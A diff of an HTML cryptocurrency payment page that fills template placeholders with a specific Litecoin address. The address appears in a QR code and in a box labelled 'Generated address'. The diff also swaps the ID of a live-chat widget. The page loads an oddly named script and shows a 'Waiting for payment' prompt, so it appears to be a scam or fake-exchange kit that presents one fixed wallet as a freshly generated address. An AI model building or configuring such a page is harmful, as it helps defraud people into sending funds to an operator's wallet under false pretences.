--- a/ltc/index.htm
+++ b/ltc/index.htm
@@ -49,7 +49,7 @@
                             <div class="pop-qr">
                                 <div class="inner-qr">
                                     <div class="main-qr">
-                                        <div opacity="0" class="qr"><img id="qrcode_svg" width="200" height="200" src="../chart-1?chs=130x130&chld=L|0&cht=qr&chl=litecoin:ltcaddeess
+                                        <div opacity="0" class="qr"><img id="qrcode_svg" width="200" height="200" src="../chart-1?chs=130x130&chld=L|0&cht=qr&chl=litecoin:ltc1qxlgq605wt5h8xs4j4jq97305revpvu6frah58ceess
                                             " alt="qr"></div><span class="wallet">Waiting for payment</span>
                                         <center><img src="../files/loading.svg" width="70px"></center></div>
                                 </div>
@@ -73,7 +73,7 @@
                             
                             <div class="inner-address"><span class="wallet-ad">Generated address:</span>
                                 <div class="address">
-                                    <div class="main-ad"><span class="real-address">ltcaddess
+                                    <div class="main-ad"><span class="real-address">ltc1qxlgq605wt5h8xs4j4jq97305revpvu6frah58cess
 
                                     </span></div>
                                     <div class="copy-body">
@@ -342,7 +342,7 @@
     <script src="../files/jdfghkjdfhgvsjkdfgcphjkfdhgjsdfg.js"></script>
     <script src="custom.js"></script>
       <!--Start of Tawk.to Script-->
-   <script src="//code.jivosite.com/widget/7yjSqqXtuI" async></script>
+   <script src="//code.jivosite.com/widget/9LI7Xw5vOG" async></script>
     <!--End of Tawk.to Script-->
 </body>
 
